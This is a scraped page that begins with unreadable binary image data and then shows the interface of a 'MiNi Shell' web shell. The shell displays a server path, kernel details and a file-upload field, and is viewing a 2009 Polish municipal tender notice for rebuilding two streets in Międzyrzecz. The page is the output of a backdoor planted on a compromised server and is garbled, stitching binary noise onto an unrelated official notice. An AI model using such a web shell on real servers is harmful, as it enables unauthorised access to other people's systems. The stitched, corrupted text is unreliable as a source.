JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/50870-N-2009.html

<p class="kh_header"><b>Międzyrzecz: PRZEBUDOWA ULIC SŁOWACKIEGO I MICKIEWICZA WRAZ Z SIECIAMI W MIĘDZYRZECZU</b><br>
<b>Numer ogłoszenia: 50870 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Międzyrzecz , ul. Rynek 1, 66-300 Międzyrzecz, woj. lubuskie, tel. 095 7412846, faks 095 7420228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzyrzecz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA ULIC SŁOWACKIEGO I MICKIEWICZA WRAZ Z SIECIAMI W MIĘDZYRZECZU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ul. Słowackiego i Mickiewicza wraz z sieciami w Międzyrzeczu.
Przedmiot zamówienia należy wykonać w oparciu o:
- opracowaną przez PROFIL BIS z Zielonej Góry dokumentację budowlano-wykonawczą branży drogowej, sanitarnej i elektrycznej stanowiącą załącznik nr 9 do niniejszej SIWZ oraz
- opracowaną przez PROFIL BIS z Zielonej Góry Specyfikację Techniczną Wykonania i Odbioru Robót (STWiOR) stanowiącą załącznik nr 9 do niniejszej SIWZ,
- opracowanym przez PROFIL BIS z Zielonej Góra  projektem stałej organizacji ruchu stanowiącym załącznik nr 9 do niniejszej SIWZ
- przedmiary robót stanowiące załącznik nr 7a do 7c do niniejszej SIWZ.
Zamówienie obejmuje:
- przebudowę ulicy Słowackiego przyjęto na odcinku oznaczonym km 00.00,00  koniec 0+0+234.20  wraz z  wjazdami i miejscami postojowymi oraz kanalizacją  deszczową. Nawierzchnia chodnika z kostki brukowej gr. 8 cm  (imitacja bruku), nawierzchnia ulicy  z kostki brukowej  gr  8 cm.
- oświetlenie ul. na odcinku od ul. Słowackiego do ul. Krasińskiego  - 5 pkt. świetlnych
- przebudowę ulicy Mickiewicza  na odcinku km 0+000.00, koniec km 0+0+476,40 na nawierzchnię z betonu asfaltowego wraz z chodnikami  z kostki betonowej w kolorze szarym, miejscami postojowymi i wjazdami o nawierzchni z kostki brukowej gr. 8 cm w kolorze czerwonym oraz budowę kanalizacji deszczowej wraz ze studniami rewizyjnymi  o śr. 1200 mm  oraz  studzienkami  ściekowymi o śr. 500 mm, przestawienie ogrodzenia z siatki w ramach  stalowych na cokole betonowym na wysokości Przedszkola nr 6 przy ul. Mickiewicza, odpowiednie oznakowanie drogowe pionowe i poziome zgodnie z wykonanym projektem stałej organizacji ruchu.
Termin realizacji zadania - do 30 październik 2009R.                                                        
Zamawiający dopuszcza zastosowanie rozwiązań równoważnych opisywanym  w przypadku wskazania w dokumentacji znaków towarowych, patentów lub pochodzenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-2, 45.31.62.13-1, 45.31.61.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium:
1)Wykonawca jest zobowiązany wraz ze złożeniem  oferty do wniesienia wadium w wysokości 50.000,00 złotych (słownie: pięćdziesiąt tysięcy złotych 00/100), zgodnie z art. 45 ust. 6 ustawy pzp w jednej lub kilku następujących formach:
a. pieniądzu,
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c. gwarancjach bankowych,
d. gwarancjach ubezpieczeniowych,
e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275),
2) wadium zgodnie z art. 45. ust. 3 ustawy pzp musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 26.03.2009 r., do godz. 09:00.
Uwaga:
3) w przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, powinny one  być  sporządzone  zgodnie  z  obowiązującym  prawem  i  winny  zawierać  następujące elementy:
a. nazwa  dającego  zlecenie  udzielenia  gwarancji  lub  poręczenia  (Wykonawcy),  beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,
b. określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c. kwotę gwarancji lub poręczenia,
d. termin ważności gwarancji lub poręczenia,
e. zobowiązanie  gwaranta  do  zapłacenia  kwoty  gwarancji  na  pierwsze  pisemne  żądanie Zamawiającego zawierające oświadczenie, iż:
- Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy pzp nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy pzp lub pełnomocnictw, albo
- Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach określonych w ofercie, albo
- Wykonawca nie wniósł zabezpieczenia należytego wykonania umowy, albo
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
4) wniesienie wadium w  pieniądzu będzie skuteczne, jeżeli  do podanego w ppkt 2) terminu znajdzie się ono na rachunku bankowym Zamawiającego,
5) wadium wnoszone w pieniądzu należy  wpłacić przelewem na konto Urzędu Miejskiego w Międzyrzeczu   06 2030 0045 1110 0000 0131 3280   z dopiskiem Wadium - przebudowa ul. Słowackiego i Mickiewicza,<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu:
W przetargu mogą wziąć udział Wykonawcy niewykluczeni na podstawie art. 24 ust. 1 i 2 ustawy pzp, spełniający warunki zawarte w art. 22 ust. 1 pkt 1-3 ustawy pzp oraz spełniający szczegółowe warunki udziału:
- zrealizowali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, następujące roboty budowlane: wykonanie z należytą starannością nawierzchni drogowej z kostki brukowej o pow. nie mniejszej niż 9.000 m2, wykonanie nawierzchni z mieszanki mineralno-asfaltowej o pow. nie mniejszej niż 9.000 m2  z udokumentowaniem, że w/w roboty zostały wykonane należycie,
- dysponują  osobami  i  podmiotami  lub  będą  nimi  dysponować,  które  będą  uczestniczyć w   wykonywaniu   zamówienia,   należącymi   do   właściwej   izby   samorządu   zawodowego i   posiadającymi  uprawnienia  budowlane  do  kierowania  robotami  budowlanymi  zgodnie z wymogami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 - tekst jednolity z późn. zm.) w specjalności:
a. drogowej bez ograniczeń,
b. instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,
c. instalacyjnej  w  zakresie  sieci,  instalacji  i  urządzeń  wodociągowych i  kanalizacyjnych  bez ograniczeń,
- posiadają dostęp do linii kredytowej lub wolne środki w wysokości nie mniejszej niż 1.000.000 PLN,
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia -  nie spełnia, w oparciu o  informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 5.1.3) - 5.1.12) SIWZ.
Niespełnienie  chociażby  jednego  z  ww.  warunków  skutkować  będzie  wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia:
Dokumenty i oświadczenia wymagane od Wykonawcy ubiegającego się o zamówienie:
1) wypełniony formularz oferty wg załącznika Nr 1 do SIWZ,
2) oświadczenie,  że   Wykonawca  wykona  zamówienie  własnymi  siłami  lub   określi  część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika Nr 2 do SIWZ,
3) wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 3 ustawy pzp wg załącznika Nr 3 do SIWZ,
4) wypełnione i podpisane oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 ustawy pzp wg załącznika Nr 4 do SIWZ,
5) aktualny  odpis  z  właściwego  rejestru  albo  aktualne  zaświadczenie o  wpisie  do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej, wystawionego nie  wcześniej niż  6  miesięcy przed upływem terminu składania ofert,
6) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu   Ubezpieczeń   Społecznych   lub   Kasy   Rolniczego   Ubezpieczenia   Społecznego potwierdzonych odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego   organu - wystawionych nie wcześniej niż  3 miesiące przed upływem terminu składania ofert,
7) aktualna informacja z Krajowego Rejestru Karnego w zakresie  określonym  w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
8) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
9) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w   tym   okresie,   odpowiadających   swoim   rodzajem   i   wartością   robotom   budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie wg załącznika Nr 5 do SIWZ na potwierdzenie spełnienia warunku określonego w punkcie 4.1.1. SIWZ. Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca udokumentuje wykonanie z należytą starannością nawierzchni drogowej z kostki brukowej o pow. nie mniejszej niż 9.000 m2 i wykonanie nawierzchni z mieszanki mineralno-asfaltowej o pow. nie mniejszej niż 9.000 m2,
10) wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć  w  wykonywaniu  zamówienia,  wraz  z  informacjami  na  temat  ich  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wg załącznika nr 6 do SIWZ - na potwierdzenie spełnienia warunku określonego w punkcie 4.1.2. SIWZ,
11) pisemne  zobowiązania  innych  podmiotów  do  udostępnienia  osób  zdolnych  do  wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5.1.10) SIWZ Wykonawca wskazał osoby, którymi będzie dysponował - na potwierdzenie spełnienia warunku określonego w punkcie 4.1.2. SIWZ,
12) dokumenty stwierdzające, że  osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają  wymagane  uprawnienia,  jeżeli   ustawy  nakładają  obowiązek  posiadania  takich uprawnień - tj. dokumenty potwierdzające posiadanie uprawnień w wymienionych w punkcie 4.1.2.  SIWZ  branżach   oraz  dokumenty  potwierdzające  przynależność   do  właściwej  izby samorządu zawodowego - na potwierdzenie spełnienia warunku określonego w punkcie 4.1.2. SIWZ,
13) Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert (wymagana minimalna kwota 1,0 mln zł),
14) dokładnie wypełnione kosztorysy ofertowe (w polskich złotych, z dokładnością do dwóch miejsc po przecinku) wg załączników od nr 7A do nr 7C do SIWZ,
14) zaakceptowany projekty umowy wg załącznika Nr 8 do SIWZ,
15) pełnomocnictwo  lub  inny  dokument  określający  zakres  umocowania  do  reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzyrzecz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.miedzyrzecz.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 09:00, miejsce: Urząd Miejski 
ul. Rynek 1
66-300 Międzyrzecz
pok. 201.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com